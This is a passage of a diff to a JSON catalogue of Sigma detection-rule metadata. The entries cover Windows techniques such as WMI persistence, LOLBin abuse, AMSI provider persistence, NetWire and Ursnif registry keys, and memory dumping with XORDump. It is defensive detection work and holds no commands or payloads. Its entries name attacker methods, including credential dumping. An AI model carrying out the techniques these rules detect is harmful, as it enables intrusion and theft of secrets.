"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-10---application-uninstall-using-wmic", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remove_application.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ] - }, - "uuid": "b53317a0-8acf-4fd1-8de8-a5401e776b96", - "value": "WMI Uninstall An Application" - }, - { - "description": "Detects usage of wmic to start or stop a service", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/20", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_wmic_service.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_service.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ] - }, - "uuid": "0b7163dc-7eee-4960-af17-c0cd517f92da", - "value": "WMIC Service Start/Stop" - }, - { - "description": "Detects wmic known recon method to look for unquoted service paths, often used by pentest and attackers enum scripts", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/20", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_wmic_unquoted_service_search.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", - "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_unquoted_service_search.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ] - }, - "uuid": "68bcd73b-37ef-49cb-95fc-edc809730be6", - "value": "WMIC Unquoted Services Path Lookup" - }, - { - "description": "Detects wmiprvse spawning processes", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/08/15", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_wmiprvse_spawning_process.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190810201010.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmiprvse_spawning_process.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ] - }, - "uuid": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", - "value": "Wmiprvse Spawning Process" - }, - { - "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", + "description": "Detects a suspicious program execution in Outlook temp folder", "meta": { "author": "Florian Roth", - "creation_date": "2019/10/11", + "creation_date": "2019/10/01", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml", - "level": "critical", + "filename": "proc_creation_win_susp_outlook_temp.yml", + "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/cglyer/status/1182389676876980224", - "https://twitter.com/cglyer/status/1182391019633029120", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_outlook_temp.yml" ], "tags": [ - "attack.persistence", - "attack.t1546.003" + "attack.initial_access", + "attack.t1566.001" ] }, - "uuid": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", - "value": "WMI Backdoor Exchange Transport Agent" + "uuid": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", + "value": "Execution in Outlook Temp Folder" }, { - "description": "Detects WMI script event consumers", + "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", "meta": { - "author": "Thomas Patzke", - "creation_date": "2018/03/07", + "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", + "creation_date": "2019/11/15", "falsepositive": [ - "Legitimate event consumers", - "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" + "Unknown" ], - "filename": "proc_creation_win_wmi_persistence_script_event_consumer.yml", - "level": "medium", + "filename": "proc_creation_win_exploit_cve_2019_1378.yml", + "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml" + "https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1378.yml" ], "tags": [ - "attack.persistence", "attack.privilege_escalation", - "attack.t1546.003" + "attack.t1068", + "attack.execution", + "attack.t1059.003", + "attack.t1574", + "cve.2019.1378" ] }, - "uuid": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", - "value": "WMI Persistence - Script Event Consumer" + "uuid": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", + "value": "Exploiting SetupComplete.cmd CVE-2019-1378" }, { - "description": "Detects WMI spawning a PowerShell process", + "description": "Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces\nAdversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe\n", "meta": { - "author": "Markus Neis / @Karneades", - "creation_date": "2019/04/03", + "author": "Agro (@agro_sev) oscd.community", + "creation_date": "2020/10/13", "falsepositive": [ - "AppvClient", - "CCM" + "It's not an uncommon to use te.exe directly to execute legal TAEF tests" ], - "filename": "proc_creation_win_wmi_spwns_powershell.yml", - "level": "high", + "filename": "proc_creation_win_susp_use_of_te_bin.yml", + "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_spwns_powershell.yml" + "https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/", + "https://twitter.com/pabraeken/status/993298228840992768", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml" ], "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1059.001" - ] - }, - "uuid": "692f0bec-83ba-4d04-af7e-e884a96059b6", - "value": "WMI Spawning Windows PowerShell" - }, - { - "description": "Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.", - "meta": { - "author": "Nik Seetharaman, frack113", - "creation_date": "2019/01/16", - "falsepositive": [ - "Legitimate MWC use (unlikely in modern enterprise environments)" - ], - "filename": "proc_creation_win_workflow_compiler.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_workflow_compiler.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1127", "attack.t1218" ] }, - "uuid": "419dbf2b-8a9b-4bea-bf99-7544b050ec8d", - "value": "Microsoft Workflow Compiler" + "uuid": "634b00d5-ccc3-4a06-ae3b-0ec8444dd51b", + "value": "Malicious Windows Script Components File Execution by TAEF Detection" }, { - "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", + "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/18", + "author": "Tim Shelton, Florian Roth, Yassine Oukessou (fix + fp)", + "creation_date": "2022/01/13", "falsepositive": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Unknown" ], - "filename": "proc_creation_win_wpbbin_persistence.yml", + "filename": "proc_creation_win_run_executable_invalid_extension.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c", - "https://persistence-info.github.io/Data/wpbbin.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wpbbin_persistence.yml" + "https://twitter.com/mrd0x/status/1481630810495139841?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_executable_invalid_extension.yml" ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1542.001" - ] + "tags": "No established tags" }, - "uuid": "4abc0ec4-db5a-412f-9632-26659cddf145", - "value": "UEFI Persistence Via Wpbbin - ProcessCreation" + "uuid": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", + "value": "Rundll32 Execution Without DLL File" }, { - "description": "Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.", + "description": "Detects use of chcp to look up the system locale value as part of host discovery", "meta": { - "author": "Sreeman", - "creation_date": "2021/06/11", + "author": "_pete_0, TheDFIRReport", + "creation_date": "2022/02/21", + "falsepositive": [ + "During Anaconda update the 'conda.exe' process will eventually launch the command described in the detection section" + ], + "filename": "proc_creation_win_susp_codepage_lookup.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp", + "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1614.001" + ] + }, + "uuid": "7090adee-82e2-4269-bd59-80691e7c6338", + "value": "CHCP CodePage Locale Lookup" + }, + { + "description": "This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed.", + "meta": { + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "creation_date": "2021/08/23", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_write_protect_for_storage_disabled.yml", + "filename": "proc_creation_win_lolbins_with_wmiprvse_parent_process.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_with_wmiprvse_parent_process.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "8a582fe2-0882-4b89-a82a-da6b2dc32937", + "value": "Lolbins Process Creation with WmiPrvse" + }, + { + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "meta": { + "author": "Alexander Rausch", + "creation_date": "2020/06/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_redmimicry_winnti_proc.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redmimicry.com", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redmimicry_winnti_proc.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1106", + "attack.t1059.003", + "attack.t1218.011" + ] + }, + "uuid": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", + "value": "RedMimicry Winnti Playbook Execute" + }, + { + "description": "Adversaries may modify system firewalls in order to bypass controls limiting network usage", + "meta": { + "author": "frack113", + "creation_date": "2022/01/09", + "falsepositive": [ + "Legitimate administration" + ], + "filename": "proc_creation_win_netsh_fw_enable_group_rule.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_write_protect_for_storage_disabled.yml" + "https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1562" + "attack.t1562.004" ] }, - "uuid": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", - "value": "Write Protect For Storage Disabled" + "uuid": "347906f3-e207-4d18-ae5b-a9403d6bcdef", + "value": "Netsh Allow Group Policy on Microsoft Defender Firewall" }, { - "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\n", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/31", + "author": "Florian Roth, Nasreddine Bencherchali, @gott_cyber", + "creation_date": "2019/06/29", "falsepositive": [ - "Rare legitimate inline scripting by some administrators" + "Unknown how many legitimate software products use that method" ], - "filename": "proc_creation_win_wscript_shell_cli.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wscript_shell_cli.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "2c28c248-7f50-417a-9186-a85b223010ee", - "value": "Wscript Shell Run In CommandLine" - }, - { - "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/12/02", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_wsudo_susp_execution.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/M2Team/Privexec/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wsudo_susp_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1059" - ] - }, - "uuid": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", - "value": "Wsudo Suspicious Execution" - }, - { - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument which is not longer supported. This could indicate an attacker using an old technique", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/04", - "falsepositive": [ - "The \"extract\" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)" - ], - "filename": "proc_creation_win_wusa_susp_cab_extraction.yml", + "filename": "proc_creation_win_susp_explorer_break_proctree.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_susp_cab_extraction.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9", - "value": "Wusa Extracting Cab Files" - }, - { - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/05", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", - "https://www.echotrail.io/insights/search/wusa.exe/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "c74c0390-3e20-41fd-a69a-128f0275a5ea", - "value": "Wusa Extracting Cab Files From Suspicious Paths" - }, - { - "description": "Detects suspicious use of XORDump process memory dumping utility", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/28", - "falsepositive": [ - "Another tool that uses the command line switches of XORdump" - ], - "filename": "proc_creation_win_xordump.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/audibleblink/xordump", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_xordump.yml" + "https://twitter.com/bohops/status/1276357235954909188?s=12", + "https://twitter.com/CyberRaiju/status/1273597319322058752", + "https://twitter.com/nas_bench/status/1535322450858233858", + "https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.t1036" ] }, - "uuid": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", - "value": "XORDump Use" + "uuid": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", + "value": "Explorer Process Tree Break" + }, + { + "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th postiional argument", + "meta": { + "author": "Nasreddine Bencherchali, memory-shards", + "creation_date": "2022/12/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/jseerden/status/1247985304667066373/photo/1", + "https://twitter.com/lefterispan/status/1286259016436514816", + "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", + "value": "Suspicious AgentExecutor PowerShell Execution" }, { "description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. Rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.", @@ -58151,5111 +51731,13771 @@ "value": "XSL Script Processing" }, { - "description": "Raw disk access using illegitimate tools, possible defence evasion", - "meta": { - "author": "Teymur Kheirkhabarov, oscd.community", - "creation_date": "2019/10/22", - "falsepositive": [ - "Legitimate Administrator using tool for raw access or ongoing forensic investigation" - ], - "filename": "raw_access_thread_disk_access_using_illegitimate_tools.yml", - "level": "low", - "logsource.category": "raw_access_thread", - "logsource.product": "windows", - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/raw_access_thread/raw_access_thread_disk_access_using_illegitimate_tools.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1006" - ] - }, - "uuid": "db809f10-56ce-4420-8c86-d6a7d793c79c", - "value": "Raw Disk Access Using Illegitimate Tools" - }, - { - "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/21", - "falsepositive": [ - "Legitimate security products adding their own AMSI providers" - ], - "filename": "registry_add_amsi_providers_persistence.yml", - "level": "high", - "logsource.category": "registry_add", - "logsource.product": "windows", - "refs": [ - "https://persistence-info.github.io/Data/amsi.html", - "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_amsi_providers_persistence.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", - "value": "Persistence Via New AMSI Providers" - }, - { - "description": "Detects creation of UserInitMprLogonScript persistence method", - "meta": { - "author": "Tom Ueltschi (@c_APT_ure)", - "creation_date": "2019/01/12", - "falsepositive": [ - "Exclude legitimate logon scripts" - ], - "filename": "registry_add_logon_scripts_userinitmprlogonscript_reg.yml", - "level": "high", - "logsource.category": "registry_add", - "logsource.product": "windows", - "refs": [ - "https://attack.mitre.org/techniques/T1037/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_logon_scripts_userinitmprlogonscript_reg.yml" - ], - "tags": [ - "attack.t1037.001", - "attack.persistence", - "attack.lateral_movement" - ] - }, - "uuid": "9ace0707-b560-49b8-b6ca-5148b42f39fb", - "value": "Logon Scripts Creation in UserInitMprLogonScript Registry" - }, - { - "description": "Attempts to detect registry events for common NetWire key HKCU\\Software\\NetWire", - "meta": { - "author": "Christopher Peacock", - "creation_date": "2021/10/07", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_add_mal_netwire.yml", - "level": "high", - "logsource.category": "registry_add", - "logsource.product": "windows", - "refs": [ - "https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing", - "https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/", - "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", - "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line", - "https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_netwire.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "1d218616-71b0-4c40-855b-9dbe75510f7f", - "value": "NetWire RAT Registry Key" - }, - { - "description": "Detects new registry key created by Ursnif malware.", - "meta": { - "author": "megan201296", - "creation_date": "2019/02/13", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_add_mal_ursnif.yml", - "level": "high", - "logsource.category": "registry_add", - "logsource.product": "windows", - "refs": [ - "https://blog.yoroi.company/research/ursnif-long-live-the-steganography/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_ursnif.yml" - ], - "tags": [ - "attack.execution", - "attack.t1112" - ] - }, - "uuid": "21f17060-b282-4249-ade0-589ea3591558", - "value": "Ursnif" - }, - { - "description": "Detects COM object hijacking via TreatAs subkey", - "meta": { - "author": "Kutepov Anton, oscd.community", - "creation_date": "2019/10/23", - "falsepositive": [ - "Maybe some system utilities in rare cases use linking keys for backward compatibility" - ], - "filename": "registry_add_persistence_key_linking.yml", - "level": "medium", - "logsource.category": "registry_add", - "logsource.product": "windows", - "refs": [ - "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_key_linking.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.015" - ] - }, - "uuid": "9b0f8a61-91b2-464f-aceb-0527e0a45020", - "value": "Windows Registry Persistence COM Key Linking" - }, - { - "description": "Detects the of the \"accepteula\" key related to sysinternals tools being created from non sysinternals tools", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/24", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_add_renamed_sysinternals_eula_accepted.yml", - "level": "high", - "logsource.category": "registry_add", - "logsource.product": "windows", - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_renamed_sysinternals_eula_accepted.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ] - }, - "uuid": "f50f3c09-557d-492d-81db-9064a8d4e211", - "value": "Usage of Renamed Sysinternals Tools" - }, - { - "description": "Detects the usage of Suspicious Sysinternals Tools such as PsExec, Procdump...etc via the \"accepteula\" key being added to Registry", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/24", - "falsepositive": [ - "Legitimate use of SysInternals tools" - ], - "filename": "registry_add_susp_sysinternals_eula_accepted.yml", - "level": "medium", - "logsource.category": "registry_add", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/Moti_B/status/1008587936735035392", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_susp_sysinternals_eula_accepted.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ] - }, - "uuid": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", - "value": "Usage of Suspicious Sysinternals Tools" - }, - { - "description": "Detects the usage of Sysinternals Tools due to accepteula key being added to Registry", - "meta": { - "author": "Markus Neis", - "creation_date": "2017/08/28", - "falsepositive": [ - "Legitimate use of SysInternals tools", - "Programs that use the same Registry Key" - ], - "filename": "registry_add_sysinternals_eula_accepted.yml", - "level": "low", - "logsource.category": "registry_add", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/Moti_B/status/1008587936735035392", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_sysinternals_eula_accepted.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ] - }, - "uuid": "25ffa65d-76d8-4da5-a832-3f2b0136e133", - "value": "Usage of Sysinternals Tools - Registry" - }, - { - "description": "A General detection to trigger for the creation or modification of .*\\Software\\Sysinternals\\SDelete registry keys. Indicators of the use of Sysinternals SDelete tool.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/05/02", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_add_sysinternals_sdelete_registry_keys.yml", - "level": "medium", - "logsource.category": "registry_add", - "logsource.product": "windows", - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/9", - "https://threathunterplaybook.com/evals/apt29/detections/4.B.2_59A9AC92-124D-4C4B-A6BF-3121C98677C3.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_sysinternals_sdelete_registry_keys.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ] - }, - "uuid": "9841b233-8df8-4ad7-9133-b0b4402a9014", - "value": "Sysinternals SDelete Registry Keys" - }, - { - "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. It displays the dialog box […]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/21", - "falsepositive": [ - "Legitimate new entry added by windows" - ], - "filename": "registry_set_disk_cleanup_handler_new_entry_persistence.yml", - "level": "medium", - "logsource.category": "registry_add", - "logsource.product": "windows", - "refs": [ - "https://persistence-info.github.io/Data/diskcleanuphandler.html", - "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_set_disk_cleanup_handler_new_entry_persistence.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", - "value": "Persistence Via Disk Cleanup Handler - NewEntry" - }, - { - "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. Which could indicate an attacker trying to launch an encryption process", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/05", - "falsepositive": [ - "Legitimate administrators removing applications (should always be monitored)" - ], - "filename": "registry_delete_exploit_guard_protected_folders.yml", - "level": "high", - "logsource.category": "registry_delete", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/", - 